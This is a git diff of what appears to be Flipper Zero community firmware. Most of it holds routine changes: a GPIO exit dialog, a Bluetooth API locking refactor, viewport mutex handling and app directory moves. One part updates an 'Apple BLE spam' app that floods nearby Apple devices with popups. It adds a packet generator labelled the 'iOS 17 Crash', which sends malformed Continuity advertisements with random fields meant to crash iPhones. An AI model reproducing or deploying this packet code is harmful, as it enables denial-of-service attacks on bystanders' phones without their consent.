.msg = + { + .type = ContinuityTypeProximityPair, + .data = {.proximity_pair = {.prefix = 0x01, .model = 0x1620}}, + }}, }; #define PAYLOAD_COUNT ((signed)COUNT_OF(payloads)) @@ -668,10 +687,10 @@ static void draw_callback(Canvas* canvas, void* ctx) { 48, AlignLeft, AlignTop, - "App+spam by \e#WillyJL\e# XFW\n" - "Pair codes by \e#ECTO-1A\e#\n" - "BLE docs by \e#furiousMAC\e#\n" - " Version \e#1.1\e#", + "App+Spam by \e#WillyJL\e# XFW\n" + "IDs and Crash by \e#ECTO-1A\e#\n" + "Continuity by \e#furiousMAC\e#\n" + " Version \e#1.2\e#", false); break; default: { diff --git a/applications/external/apple_ble_spam/application.fam b/applications/external/apple_ble_spam/application.fam index 4bfcfac85..4aa508e98 100644 --- a/applications/external/apple_ble_spam/application.fam +++ b/applications/external/apple_ble_spam/application.fam @@ -15,6 +15,6 @@ App( ], fap_author="@Willy-JL & @ECTO-1A", fap_weburl="https://github.com/Flipper-XFW/Xtreme-Firmware/tree/dev/applications/external/apple_ble_spam", - fap_version="1.1", + fap_version="1.2", fap_description="Spam Apple devices with annoying popups and notifications via BLE packets", ) diff --git a/applications/external/apple_ble_spam/lib/continuity/continuity.c b/applications/external/apple_ble_spam/lib/continuity/continuity.c index e3fc072df..3e3616fb4 100644 --- a/applications/external/apple_ble_spam/lib/continuity/continuity.c +++ b/applications/external/apple_ble_spam/lib/continuity/continuity.c @@ -1,8 +1,10 @@ #include "continuity.h" #include +#include // Hacked together by @Willy-JL // Custom adv logic by @Willy-JL (idea by @xMasterX) +// iOS 17 Crash by @ECTO-1A // Extensive testing and research on behavior and parameters by @Willy-JL and @ECTO-1A // Structures docs and Nearby Action IDs from https://github.com/furiousMAC/continuity/ // Proximity Pair IDs from https://github.com/ECTO-1A/AppleJuice/ @@ -15,18 +17,23 @@ static const char* continuity_type_names[ContinuityTypeCount] = { [ContinuityTypeHandoff] = "Handoff", [ContinuityTypeTetheringSource] = "Tethering Source", [ContinuityTypeNearbyAction] = "Nearby Action", + [ContinuityTypeNearbyInfo] = "Nearby Info", + [ContinuityTypeCustomCrash] = "Custom Packet", }; const char* continuity_get_type_name(ContinuityType type) { return continuity_type_names[type]; } +#define HEADER_LEN (6) // 1 Length + 1 ? + 2 Company ID + 1 Continuity Type + 1 Continuity Length static uint8_t continuity_packet_sizes[ContinuityTypeCount] = { - [ContinuityTypeAirDrop] = 24, - [ContinuityTypeProximityPair] = 31, - [ContinuityTypeAirplayTarget] = 12, - [ContinuityTypeHandoff] = 20, - [ContinuityTypeTetheringSource] = 12, - [ContinuityTypeNearbyAction] = 11, + [ContinuityTypeAirDrop] = HEADER_LEN + 18, + [ContinuityTypeProximityPair] = HEADER_LEN + 25, + [ContinuityTypeAirplayTarget] = HEADER_LEN + 6, + [ContinuityTypeHandoff] = HEADER_LEN + 14, + [ContinuityTypeTetheringSource] = HEADER_LEN + 6, + [ContinuityTypeNearbyAction] = HEADER_LEN + 5, + [ContinuityTypeNearbyInfo] = HEADER_LEN + 5, + [ContinuityTypeCustomCrash] = HEADER_LEN + 11, }; uint8_t continuity_get_packet_size(ContinuityType type) { return continuity_packet_sizes[type]; @@ -37,11 +44,11 @@ void continuity_generate_packet(const ContinuityMsg* msg, uint8_t* packet) { uint8_t i = 0; packet[i++] = size - 1; // Packet Length - packet[i++] = 0xFF; // Packet Header - packet[i++] = 0x4C; // ... + packet[i++] = 0xFF; // Packet Type (Manufacturer Specific) + packet[i++] = 0x4C; // Packet Company ID (Apple, Inc.) packet[i++] = 0x00; // ... - packet[i++] = msg->type; // Type - packet[i] = size - i - 1; // Message Length + packet[i++] = msg->type; // Continuity Type + packet[i] = size - i - 1; // Continuity Length i++; switch(msg->type) { @@ -124,6 +131,34 @@ void continuity_generate_packet(const ContinuityMsg* msg, uint8_t* packet) { i += 3; break; + case ContinuityTypeNearbyInfo: + packet[i++] = ((rand() % 16) << 4) + (rand() % 16); // Status Flags and Action Code + packet[i++] = (rand() % 256); // Status Flags + packet[i++] = (rand() % 256); // Authentication Tag + packet[i++] = (rand() % 256); // ... + packet[i++] = (rand() % 256); // ... + break; + + case ContinuityTypeCustomCrash: + // Found by @ECTO-1A + + i -= 2; // Override segment header + packet[i++] = ContinuityTypeNearbyAction; // Type + packet[i++] = 0x05; // Length + packet[i++] = 0xC1; // Action Flags + const uint8_t types[] = {0x27, 0x09, 0x02, 0x1e, 0x2b, 0x2d, 0x2f, 0x01, 0x06, 0x20, 0xc0}; + packet[i++] = types[rand() % COUNT_OF(types)]; // Action Type + furi_hal_random_fill_buf(&packet[i], 3); // Authentication Tag + i += 3; + + packet[i++] = 0x00; // ??? + packet[i++] = 0x00; // ??? + + packet[i++] = ContinuityTypeNearbyInfo; // Type ??? + furi_hal_random_fill_buf(&packet[i], 3); // Shenanigans (Length + IDK) ??? + i += 3; + break; + default: break; } diff --git a/applications/external/apple_ble_spam/lib/continuity/continuity.h b/applications/external/apple_ble_spam/lib/continuity/continuity.h index 243e14f45..d582df761 100644 --- a/applications/external/apple_ble_spam/lib/continuity/continuity.h +++ b/applications/external/apple_ble_spam/lib/continuity/continuity.h @@ -5,6 +5,7 @@ // Hacked together by @Willy-JL // Custom adv logic by @Willy-JL (idea by @xMasterX) +// iOS 17 Crash by @ECTO-1A // Extensive testing and research on behavior and parameters by @Willy-JL and @ECTO-1A // Structures docs and Nearby Action IDs from https://github.com/furiousMAC/continuity/ // Proximity Pair IDs from https://github.com/ECTO-1A/AppleJuice/ @@ -17,6 +18,9 @@ typedef enum { ContinuityTypeHandoff = 0x0C, ContinuityTypeTetheringSource = 0x0E, ContinuityTypeNearbyAction = 0x0F, + ContinuityTypeNearbyInfo = 0x10, + + ContinuityTypeCustomCrash, ContinuityTypeCount } ContinuityType; @@ -37,6 +41,10 @@ typedef union { uint8_t flags; uint8_t type; } nearby_action; + struct { + } nearby_info; + struct { + } custom_crash; } ContinuityData; typedef struct { diff --git a/applications/main/archive/helpers/archive_files.c b/applications/main/archive/helpers/archive_files.c index 66d547886..df62030c8 100644 --- a/applications/main/archive/helpers/archive_files.c +++ b/applications/main/archive/helpers/archive_files.c @@ -1,9 +1,9 @@ #include "archive_files.h" #include "archive_apps.h" #include "archive_browser.h" -#include -#include -#include +#include +#include +#include #define TAG "Archive" diff --git a/applications/main/gpio/gpio_app.c b/applications/main/gpio/gpio_app.c index 3fecc5427..7160235a5 100644 --- a/applications/main/gpio/gpio_app.c +++ b/applications/main/gpio/gpio_app.c @@ -43,6 +43,11 @@ GpioApp* gpio_app_alloc() { app->notifications = furi_record_open(RECORD_NOTIFICATION); + // Dialog view + app->dialog = dialog_ex_alloc(); + view_dispatcher_add_view( + app->view_dispatcher, GpioAppViewExitConfirm, dialog_ex_get_view(app->dialog)); + app->var_item_list = variable_item_list_alloc(); view_dispatcher_add_view( app->view_dispatcher, @@ -91,10 +96,12 @@ void gpio_app_free(GpioApp* app) { view_dispatcher_remove_view(app->view_dispatcher, GpioAppViewUsbUart); view_dispatcher_remove_view(app->view_dispatcher, GpioAppViewUsbUartCfg); view_dispatcher_remove_view(app->view_dispatcher, GpioAppViewUsbUartCloseRpc); + view_dispatcher_remove_view(app->view_dispatcher, GpioAppViewExitConfirm); variable_item_list_free(app->var_item_list); widget_free(app->widget); gpio_test_free(app->gpio_test); gpio_usb_uart_free(app->gpio_usb_uart); + dialog_ex_free(app->dialog); gpio_i2c_scanner_free(app->gpio_i2c_scanner); gpio_i2c_sfp_free(app->gpio_i2c_sfp); diff --git a/applications/main/gpio/gpio_app_i.h b/applications/main/gpio/gpio_app_i.h index 20140f07a..6f2123f5f 100644 --- a/applications/main/gpio/gpio_app_i.h +++ b/applications/main/gpio/gpio_app_i.h @@ -13,6 +13,7 @@ #include #include #include +#include #include "views/gpio_test.h" #include "views/gpio_usb_uart.h" #include "views/gpio_i2c_scanner.h" @@ -25,6 +26,7 @@ struct GpioApp { ViewDispatcher* view_dispatcher; SceneManager* scene_manager; Widget* widget; + DialogEx* dialog; VariableItemList* var_item_list; VariableItem* var_item_flow; @@ -43,6 +45,7 @@ typedef enum { GpioAppViewUsbUart, GpioAppViewUsbUartCfg, GpioAppViewUsbUartCloseRpc, + GpioAppViewExitConfirm, GpioAppViewI2CScanner, GpioAppViewI2CSfp } GpioAppView; diff --git a/applications/main/gpio/scenes/gpio_scene_config.h b/applications/main/gpio/scenes/gpio_scene_config.h index faca22d8d..d2a98a847 100644 --- a/applications/main/gpio/scenes/gpio_scene_config.h +++ b/applications/main/gpio/scenes/gpio_scene_config.h @@ -3,5 +3,6 @@ ADD_SCENE(gpio, test, Test) ADD_SCENE(gpio, usb_uart, UsbUart) ADD_SCENE(gpio, usb_uart_cfg, UsbUartCfg) ADD_SCENE(gpio, usb_uart_close_rpc, UsbUartCloseRpc) +ADD_SCENE(gpio, exit_confirm, ExitConfirm) ADD_SCENE(gpio, i2c_scanner, I2CScanner) ADD_SCENE(gpio, i2c_sfp, I2CSfp) diff --git a/applications/main/gpio/scenes/gpio_scene_exit_confirm.c b/applications/main/gpio/scenes/gpio_scene_exit_confirm.c new file mode 100644 index 000000000..efb0734a3 --- /dev/null +++ b/applications/main/gpio/scenes/gpio_scene_exit_confirm.c @@ -0,0 +1,44 @@ +#include "gpio_app_i.h" + +void gpio_scene_exit_confirm_dialog_callback(DialogExResult result, void* context) { + GpioApp* app = context; + + view_dispatcher_send_custom_event(app->view_dispatcher, result); +} + +void gpio_scene_exit_confirm_on_enter(void* context) { + GpioApp* app = context; + DialogEx* dialog = app->dialog; + + dialog_ex_set_context(dialog, app); + dialog_ex_set_left_button_text(dialog, "Exit"); + dialog_ex_set_right_button_text(dialog, "Stay"); + dialog_ex_set_header(dialog, "Exit USB-UART?", 22, 12, AlignLeft, AlignTop); + dialog_ex_set_result_callback(dialog, gpio_scene_exit_confirm_dialog_callback); + + view_dispatcher_switch_to_view(app->view_dispatcher, GpioAppViewExitConfirm); +} + +bool gpio_scene_exit_confirm_on_event(void* context, SceneManagerEvent event) { + GpioApp* app = context; + bool consumed = false; + + if(event.type == SceneManagerEventTypeCustom) { + if(event.event == DialogExResultRight) { + consumed = scene_manager_previous_scene(app->scene_manager); + } else if(event.event == DialogExResultLeft) { + scene_manager_search_and_switch_to_previous_scene(app->scene_manager, GpioSceneStart); + } + } else if(event.type == SceneManagerEventTypeBack) { + consumed = true; + } + + return consumed; +} + +void gpio_scene_exit_confirm_on_exit(void* context) { + GpioApp* app = context; + + // Clean view + dialog_ex_reset(app->dialog); +} diff --git a/applications/main/gpio/scenes/gpio_scene_usb_uart.c b/applications/main/gpio/scenes/gpio_scene_usb_uart.c index c5e085192..9a3514ca4 100644 --- a/applications/main/gpio/scenes/gpio_scene_usb_uart.c +++ b/applications/main/gpio/scenes/gpio_scene_usb_uart.c @@ -42,6 +42,9 @@ bool gpio_scene_usb_uart_on_event(void* context, SceneManagerEvent event) { scene_manager_set_scene_state(app->scene_manager, GpioSceneUsbUart, 1); scene_manager_next_scene(app->scene_manager, GpioSceneUsbUartCfg); return true; + } else if(event.type == SceneManagerEventTypeBack) { + scene_manager_next_scene(app->scene_manager, GpioSceneExitConfirm); + return true; } else if(event.type == SceneManagerEventTypeTick) { uint32_t tx_cnt_last = scene_usb_uart->state.tx_cnt; uint32_t rx_cnt_last = scene_usb_uart->state.rx_cnt; diff --git a/applications/services/bt/bt_service/bt.c b/applications/services/bt/bt_service/bt.c index a7e6f7317..98ff257d7 100644 --- a/applications/services/bt/bt_service/bt.c +++ b/applications/services/bt/bt_service/bt.c @@ -1,7 +1,7 @@ #include "bt_i.h" -#include "battery_service.h" #include "bt_keys_storage.h" +#include #include #include #include @@ -374,13 +374,13 @@ static void bt_change_profile(Bt* bt, BtMessage* message) { *message->result = false; } } - furi_event_flag_set(bt->api_event, BT_API_UNLOCK_EVENT); + if(message->lock) api_lock_unlock(message->lock); } -static void bt_close_connection(Bt* bt) { +static void bt_close_connection(Bt* bt, BtMessage* message) { bt_close_rpc_connection(bt); furi_hal_bt_stop_advertising(); - furi_event_flag_set(bt->api_event, BT_API_UNLOCK_EVENT); + if(message->lock) api_lock_unlock(message->lock); } static inline FuriHalBtProfile get_hal_bt_profile(BtProfile profile) { @@ -527,7 +527,7 @@ int32_t bt_srv(void* p) { } else if(message.type == BtMessageTypeSetProfile) { bt_change_profile(bt, &message); } else if(message.type == BtMessageTypeDisconnect) { - bt_close_connection(bt); + bt_close_connection(bt, &message); } else if(message.type == BtMessageTypeForgetBondedDevices) { bt_keys_storage_delete(bt->keys_storage); } diff --git a/applications/services/bt/bt_service/bt_api.c b/applications/services/bt/bt_service/bt_api.c index 2f56b50a3..e31031783 100644 --- a/applications/services/bt/bt_service/bt_api.c +++ b/applications/services/bt/bt_service/bt_api.c @@ -6,11 +6,14 @@ bool bt_set_profile(Bt* bt, BtProfile profile) { // Send message bool result = false; BtMessage message = { - .type = BtMessageTypeSetProfile, .data.profile = profile, .result = &result}; + .lock = api_lock_alloc_locked(), + .type = BtMessageTypeSetProfile, + .data.profile = profile, + .result = &result}; furi_check( furi_message_queue_put(bt->message_queue, &message, FuriWaitForever) == FuriStatusOk); // Wait for unlock - furi_event_flag_wait(bt->api_event, BT_API_UNLOCK_EVENT, FuriFlagWaitAny, FuriWaitForever); + api_lock_wait_unlock_and_free(message.lock); return result; } @@ -19,11 +22,11 @@ void bt_disconnect(Bt* bt) { furi_assert(bt); // Send message - BtMessage message = {.type = BtMessageTypeDisconnect}; + BtMessage message = {.lock = api_lock_alloc_locked(), .type = BtMessageTypeDisconnect}; furi_check( furi_message_queue_put(bt->message_queue, &message, FuriWaitForever) == FuriStatusOk); // Wait for unlock - furi_event_flag_wait(bt->api_event, BT_API_UNLOCK_EVENT, FuriFlagWaitAny, FuriWaitForever); + api_lock_wait_unlock_and_free(message.lock); } void bt_set_status_changed_callback(Bt* bt, BtStatusChangedCallback callback, void* context) { diff --git a/applications/services/bt/bt_service/bt_i.h b/applications/services/bt/bt_service/bt_i.h index dc36ea40b..09615d9d5 100644 --- a/applications/services/bt/bt_service/bt_i.h +++ b/applications/services/bt/bt_service/bt_i.h @@ -4,6 +4,7 @@ #include #include +#include #include #include @@ -21,8 +22,6 @@ #define BT_KEYS_STORAGE_OLD_PATH INT_PATH(".bt.keys") #define BT_KEYS_STORAGE_PATH CFG_PATH("bt.keys") -#define BT_API_UNLOCK_EVENT (1UL << 0) - typedef enum { BtMessageTypeUpdateStatus, BtMessageTypeUpdateBatteryLevel, @@ -47,6 +46,7 @@ typedef union { } BtMessageData; typedef struct { + FuriApiLock lock; BtMessageType type; BtMessageData data; bool* result; diff --git a/applications/services/gui/elements.c b/applications/services/gui/elements.c index 4944b3ac9..849bf18b6 100644 --- a/applications/services/gui/elements.c +++ b/applications/services/gui/elements.c @@ -313,6 +313,7 @@ void elements_multiline_text_aligned( } else if((y + font_height) > canvas_height(canvas)) { line = furi_string_alloc_printf("%.*s...\n", chars_fit, start); } else { + chars_fit -= 1; // account for the dash line = furi_string_alloc_printf("%.*s-\n", chars_fit, start); } canvas_draw_str_aligned(canvas, x, y, horizontal, vertical, furi_string_get_cstr(line)); diff --git a/applications/services/gui/view_port.c b/applications/services/gui/view_port.c index 0e0c0e562..25f670a7c 100644 --- a/applications/services/gui/view_port.c +++ b/applications/services/gui/view_port.c @@ -6,6 +6,8 @@ #include "gui.h" #include "gui_i.h" +#define TAG "ViewPort" + _Static_assert(ViewPortOrientationMAX == 4, "Incorrect ViewPortOrientation count"); _Static_assert( (ViewPortOrientationHorizontal == 0 && ViewPortOrientationHorizontalFlip == 1 && @@ -174,10 +176,15 @@ void view_port_input_callback_set( void view_port_update(ViewPort* view_port) { furi_assert(view_port); - // TODO: Uncomment when all apps are verified to be fixed !!!!!!!!!!!!!!!!!!!!!!! - //furi_check(furi_mutex_acquire(view_port->mutex, FuriWaitForever) == FuriStatusOk); + + // We are not going to lockup system, but will notify you instead + // Make sure that you don't call viewport methods inside of another mutex, especially one that is used in draw call + if(furi_mutex_acquire(view_port->mutex, 2) != FuriStatusOk) { + FURI_LOG_W(TAG, "ViewPort lockup: see %s:%d", __FILE__, __LINE__ - 3); + } + if(view_port->gui && view_port->is_enabled) gui_update(view_port->gui); - //furi_check(furi_mutex_release(view_port->mutex) == FuriStatusOk); + furi_mutex_release(view_port->mutex); } void view_port_gui_set(ViewPort* view_port, Gui* gui) { @@ -190,14 +197,21 @@ void view_port_gui_set(ViewPort* view_port, Gui* gui) { void view_port_draw(ViewPort* view_port, Canvas* canvas) { furi_assert(view_port); furi_assert(canvas); - furi_check(furi_mutex_acquire(view_port->mutex, FuriWaitForever) == FuriStatusOk); + + // We are not going to lockup system, but will notify you instead + // Make sure that you don't call viewport methods inside of another mutex, especially one that is used in draw call + if(furi_mutex_acquire(view_port->mutex, 2) != FuriStatusOk) { + FURI_LOG_W(TAG, "ViewPort lockup: see %s:%d", __FILE__, __LINE__ - 3); + } + furi_check(view_port->gui); if(view_port->draw_callback) { view_port_setup_canvas_orientation(view_port, canvas); view_port->draw_callback(canvas, view_port->draw_callback_context); } - furi_check(furi_mutex_release(view_port->mutex) == FuriStatusOk); + + furi_mutex_release(view_port->mutex); } void view_port_input(ViewPort* view_port, InputEvent* event) { diff --git a/applications/services/loader/loader_cli.c b/applications/services/loader/loader_cli.c index 263b9601a..17f0319e2 100644 --- a/applications/services/loader/loader_cli.c +++ b/applications/services/loader/loader_cli.c @@ -2,6 +2,7 @@ #include #include #include +#include #include "loader.h" static void loader_cli_print_usage() { @@ -56,6 +57,10 @@ static void loader_cli_open(FuriString* args, Loader* loader) { FuriString* error_message = furi_string_alloc(); if(loader_start(loader, app_name_str, args_str, error_message) != LoaderStatusOk) { printf("%s\r\n", furi_string_get_cstr(error_message)); + } else { + NotificationApp* notifications = furi_record_open(RECORD_NOTIFICATION); + notification_message(notifications, &sequence_display_backlight_on); + furi_record_close(RECORD_NOTIFICATION); } furi_string_free(error_message); } while(false); diff --git a/applications/services/notification/notification_app.c b/applications/services/notification/notification_app.c index 038ebc42c..c81ecabcb 100644 --- a/applications/services/notification/notification_app.c +++ b/applications/services/notification/notification_app.c @@ -453,8 +453,11 @@ static bool notification_load_settings(NotificationApp* app) { static void input_event_callback(const void* value, void* context) { furi_assert(value); furi_assert(context); + const InputEvent* event = value; NotificationApp* app = context; - notification_message(app, &sequence_display_backlight_on); + if(event->sequence_source == INPUT_SEQUENCE_SOURCE_HARDWARE) { + notification_message(app, &sequence_display_backlight_on); + } } // App alloc diff --git a/applications/settings/bt_settings_app/scenes/bt_settings_scene_forget_dev_confirm.c b/applications/settings/bt_settings_app/scenes/bt_settings_scene_forget_dev_confirm.c index 7fef6a0e6..92ced8f82 100644 --- a/applications/settings/bt_settings_app/scenes/bt_settings_scene_forget_dev_confirm.c +++ b/applications/settings/bt_settings_app/scenes/bt_settings_scene_forget_dev_confirm.c @@ -1,8 +1,6 @@ #include "../bt_settings_app.h" #include #include -#include -#include void bt_settings_scene_forget_dev_confirm_dialog_callback(DialogExResult result, void* context) { furi_assert(context); @@ -35,12 +33,16 @@ bool bt_settings_scene_forget_dev_confirm_on_event(void* context, SceneManagerEv bt_keys_storage_set_default_path(app->bt); bt_forget_bonded_devices(app->bt); - // also remove keys of badkb and bt remote + // also remove keys for apps + const char* keys_paths[] = { + BAD_KB_KEYS_PATH, + EXT_PATH("apps_data/hid_ble/.bt_hid.keys"), + EXT_PATH("apps_data/totp/.bt_hid.keys"), + }; Storage* storage = furi_record_open(RECORD_STORAGE); - storage_simply_remove(storage, BAD_KB_KEYS_PATH); - storage_simply_remove( - storage, EXT_PATH("apps_data/hid_ble/") HID_BT_KEYS_STORAGE_NAME); - storage_simply_remove(storage, TOTP_BT_KEYS_STORAGE_PATH); + for(size_t i = 0; i < COUNT_OF(keys_paths); i++) { + storage_simply_remove(storage, keys_paths[i]); + } furi_record_close(RECORD_STORAGE); scene_manager_next_scene(app->scene_manager, BtSettingsAppSceneForgetDevSuccess); diff --git a/applications/external/hex_viewer/LICENSE b/applications/system/hex_viewer/LICENSE similarity index 100% rename from applications/external/hex_viewer/LICENSE rename to applications/system/hex_viewer/LICENSE diff --git a/applications/external/hex_viewer/application.fam b/applications/system/hex_viewer/application.fam similarity index 100% rename from applications/external/hex_viewer/application.fam rename to applications/system/hex_viewer/application.fam diff --git a/applications/external/hex_viewer/hex_viewer.c b/applications/system/hex_viewer/hex_viewer.c similarity index 100% rename from applications/external/hex_viewer/hex_viewer.c rename to applications/system/hex_viewer/hex_viewer.c diff --git a/applications/external/hex_viewer/icons/hex_10px.png b/applications/system/hex_viewer/icons/hex_10px.png similarity index 100% rename from applications/external/hex_viewer/icons/hex_10px.png rename to applications/system/hex_viewer/icons/hex_10px.png diff --git a/applications/external/ir_remote/application.fam b/applications/system/ir_remote/application.fam similarity index 100% rename from applications/external/ir_remote/application.fam rename to applications/system/ir_remote/application.fam diff --git a/applications/external/ir_remote/infrared_remote.c b/applications/system/ir_remote/infrared_remote.c similarity index 100% rename from applications/external/ir_remote/infrared_remote.c rename to applications/system/ir_remote/infrared_remote.c diff --git a/applications/external/ir_remote/infrared_remote.h b/applications/system/ir_remote/infrared_remote.h similarity index 100% rename from applications/external/ir_remote/infrared_remote.h rename to applications/system/ir_remote/infrared_remote.h diff --git a/applications/external/ir_remote/infrared_remote_app.c b/applications/system/ir_remote/infrared_remote_app.c similarity index 100% rename from applications/external/ir_remote/infrared_remote_app.c rename to applications/system/ir_remote/infrared_remote_app.c diff --git a/applications/external/ir_remote/infrared_remote_button.c b/applications/system/ir_remote/infrared_remote_button.c similarity index 100% rename from applications/external/ir_remote/infrared_remote_button.c rename to applications/system/ir_remote/infrared_remote_button.c diff --git a/applications/external/ir_remote/infrared_remote_button.h b/applications/system/ir_remote/infrared_remote_button.h similarity index 100% rename from applications/external/ir_remote/infrared_remote_button.h rename to applications/system/ir_remote/infrared_remote_button.h diff --git a/applications/external/ir_remote/infrared_signal.c b/applications/system/ir_remote/infrared_signal.c similarity index 100% rename from applications/external/ir_remote/infrared_signal.c rename to applications/system/ir_remote/infrared_signal.c diff --git a/applications/external/ir_remote/infrared_signal.h b/applications/system/ir_remote/infrared_signal.h similarity index 100% rename from applications/external/ir_remote/infrared_signal.h rename to applications/system/ir_remote/infrared_signal.h diff --git a/applications/external/ir_remote/ir_10px.png b/applications/system/ir_remote/ir_10px.png similarity index 100% rename from applications/external/ir_remote/ir_10px.png rename to applications/system/ir_remote/ir_10px.png diff --git a/applications/external/nightstand/application.fam b/applications/system/nightstand/application.fam similarity index 100% rename from applications/external/nightstand/application.fam rename to applications/system/nightstand/application.fam diff --git a/applications/external/nightstand/clock.png b/applications/system/nightstand/clock.png similarity index 100% rename from applications/external/nightstand/clock.png rename to applications/system/nightstand/clock.png diff --git a/applications/external/nightstand/clock_app.c b/applications/system/nightstand/clock_app.c similarity index 100% rename from applications/external/nightstand/clock_app.c rename to applications/system/nightstand/clock_app.c diff --git a/applications/external/nightstand/clock_app.h b/applications/system/nightstand/clock_app.h similarity index 100% rename from applications/external/nightstand/clock_app.h rename to applications/system/nightstand/clock_app.h diff --git a/applications/external/subghz_playlist/application.fam b/applications/system/subghz_playlist/application.fam similarity index 100% rename from applications/external/subghz_playlist/application.fam rename to applications/system/subghz_playlist/application.fam diff --git a/applications/external/subghz_playlist/canvas_helper.c b/applications/system/subghz_playlist/canvas_helper.c similarity index 100% rename from applications/external/subghz_playlist/canvas_helper.c rename to applications/system/subghz_playlist/canvas_helper.c diff --git a/applications/external/subghz_playlist/canvas_helper.h b/applications/system/subghz_playlist/canvas_helper.h similarity index 100% rename from applications/external/subghz_playlist/canvas_helper.h rename to applications/system/subghz_playlist/canvas_helper.h diff --git a/applications/external/subghz_playlist/helpers/radio_device_loader.c b/applications/system/subghz_playlist/helpers/radio_device_loader.c similarity index 100% rename from applications/external/subghz_playlist/helpers/radio_device_loader.c rename to applications/system/subghz_playlist/helpers/radio_device_loader.c diff --git a/applications/external/subghz_playlist/helpers/radio_device_loader.h b/applications/system/subghz_playlist/helpers/radio_device_loader.h similarity index 100% rename from applications/external/subghz_playlist/helpers/radio_device_loader.h rename to applications/system/subghz_playlist/helpers/radio_device_loader.h diff --git a/applications/external/subghz_playlist/playlist.c b/applications/system/subghz_playlist/playlist.c similarity index 100% rename from applications/external/subghz_playlist/playlist.c rename to applications/system/subghz_playlist/playlist.c diff --git a/applications/external/subghz_playlist/playlist_file.c b/applications/system/subghz_playlist/playlist_file.c similarity index 100% rename from applications/external/subghz_playlist/playlist_file.c rename to applications/system/subghz_playlist/playlist_file.c diff --git a/applications/external/subghz_playlist/playlist_file.h b/applications/system/subghz_playlist/playlist_file.h similarity index 100% rename from applications/external/subghz_playlist/playlist_file.h rename to applications/system/subghz_playlist/playlist_file.h diff --git a/applications/external/subghz_playlist/subplaylist_10px.png b/applications/system/subghz_playlist/subplaylist_10px.png similarity index 100% rename from applications/external/subghz_playlist/subplaylist_10px.png rename to applications/system/subghz_playlist/subplaylist_10px.png diff --git a/applications/external/subghz_remote/application.fam b/applications/system/subghz_remote/application.fam similarity index 100% rename from applications/external/subghz_remote/application.fam rename to applications/system/subghz_remote/application.fam diff --git a/applications/external/subghz_remote/helpers/subrem_custom_event.h b/applications/system/subghz_remote/helpers/subrem_custom_event.h similarity index 100% rename from applications/external/subghz_remote/helpers/subrem_custom_event.h rename to applications/system/subghz_remote/helpers/subrem_custom_event.h diff --git a/applications/external/subghz_remote/helpers/subrem_presets.c b/applications/system/subghz_remote/helpers/subrem_presets.c similarity index 100% rename from applications/external/subghz_remote/helpers/subrem_presets.c rename to applications/system/subghz_remote/helpers/subrem_presets.c diff --git a/applications/external/subghz_remote/helpers/subrem_presets.h b/applications/system/subghz_remote/helpers/subrem_presets.h similarity index 100% rename from applications/external/subghz_remote/helpers/subrem_presets.h rename to applications/system/subghz_remote/helpers/subrem_presets.h diff --git a/applications/external/subghz_remote/helpers/subrem_types.h b/applications/system/subghz_remote/helpers/subrem_types.h similarity index 100% rename from applications/external/subghz_remote/helpers/subrem_types.h rename to applications/system/subghz_remote/helpers/subrem_types.h diff --git a/applications/external/subghz_remote/helpers/txrx/Readme.md b/applications/system/subghz_remote/helpers/txrx/Readme.md similarity index 100% rename from applications/external/subghz_remote/helpers/txrx/Readme.md rename to applications/system/subghz_remote/helpers/txrx/Readme.md diff --git a/applications/external/subghz_remote/helpers/txrx/subghz_txrx.c b/applications/system/subghz_remote/helpers/txrx/subghz_txrx.c similarity index 100% rename from applications/external/subghz_remote/helpers/txrx/subghz_txrx.c rename to applications/system/subghz_remote/helpers/txrx/subghz_txrx.c diff --git a/applications/external/subghz_remote/helpers/txrx/subghz_txrx.h b/applications/system/subghz_remote/helpers/txrx/subghz_txrx.h similarity index 100% rename from applications/external/subghz_remote/helpers/txrx/subghz_txrx.h rename to applications/system/subghz_remote/helpers/txrx/subghz_txrx.h diff --git a/applications/external/subghz_remote/helpers/txrx/subghz_txrx_i.h b/applications/system/subghz_remote/helpers/txrx/subghz_txrx_i.h similarity index 100% rename from applications/external/subghz_remote/helpers/txrx/subghz_txrx_i.h rename to applications/system/subghz_remote/helpers/txrx/subghz_txrx_i.h diff --git a/applications/external/subghz_remote/icon.png b/applications/system/subghz_remote/icon.png similarity index 100% rename from applications/external/subghz_remote/icon.png rename to applications/system/subghz_remote/icon.png diff --git a/applications/external/subghz_remote/scenes/subrem_scene.c b/applications/system/subghz_remote/scenes/subrem_scene.c similarity index 100% rename from applications/external/subghz_remote/scenes/subrem_scene.c rename to applications/system/subghz_remote/scenes/subrem_scene.c diff --git a/applications/external/subghz_remote/scenes/subrem_scene.h b/applications/system/subghz_remote/scenes/subrem_scene.h similarity index 100% rename from applications/external/subghz_remote/scenes/subrem_scene.h rename to applications/system/subghz_remote/scenes/subrem_scene.h diff --git a/applications/external/subghz_remote/scenes/subrem_scene_config.h b/applications/system/subghz_remote/scenes/subrem_scene_config.h similarity index 100% rename from applications/external/subghz_remote/scenes/subrem_scene_config.h rename to applications/system/subghz_remote/scenes/subrem_scene_config.h diff --git a/applications/external/subghz_remote/scenes/subrem_scene_edit_label.c b/applications/system/subghz_remote/scenes/subrem_scene_edit_label.c similarity index 100% rename from applications/external/subghz_remote/scenes/subrem_scene_edit_label.c rename to applications/system/subghz_remote/scenes/subrem_scene_edit_label.c diff --git a/applications/external/subghz_remote/scenes/subrem_scene_edit_menu.c b/applications/system/subghz_remote/scenes/subrem_scene_edit_menu.c similarity index 100% rename from applications/external/subghz_remote/scenes/subrem_scene_edit_menu.c rename to applications/system/subghz_remote/scenes/subrem_scene_edit_menu.c diff --git a/applications/external/subghz_remote/scenes/subrem_scene_edit_preview.c b/applications/system/subghz_remote/scenes/subrem_scene_edit_preview.c similarity index 100% rename from applications/external/subghz_remote/scenes/subrem_scene_edit_preview.c rename to applications/system/subghz_remote/scenes/subrem_scene_edit_preview.c diff --git a/applications/external/subghz_remote/scenes/subrem_scene_edit_submenu.c b/applications/system/subghz_remote/scenes/subrem_scene_edit_submenu.c similarity index 100% rename from applications/external/subghz_remote/scenes/subrem_scene_edit_submenu.c rename to applications/system/subghz_remote/scenes/subrem_scene_edit_submenu.c diff --git a/applications/external/subghz_remote/scenes/subrem_scene_enter_new_name.c b/applications/system/subghz_remote/scenes/subrem_scene_enter_new_name.c similarity index 100% rename from applications/external/subghz_remote/scenes/subrem_scene_enter_new_name.c rename to applications/system/subghz_remote/scenes/subrem_scene_enter_new_name.c diff --git a/applications/external/subghz_remote/scenes/subrem_scene_open_map_file.c b/applications/system/subghz_remote/scenes/subrem_scene_open_map_file.c similarity index 100% rename from applications/external/subghz_remote/scenes/subrem_scene_open_map_file.c rename to 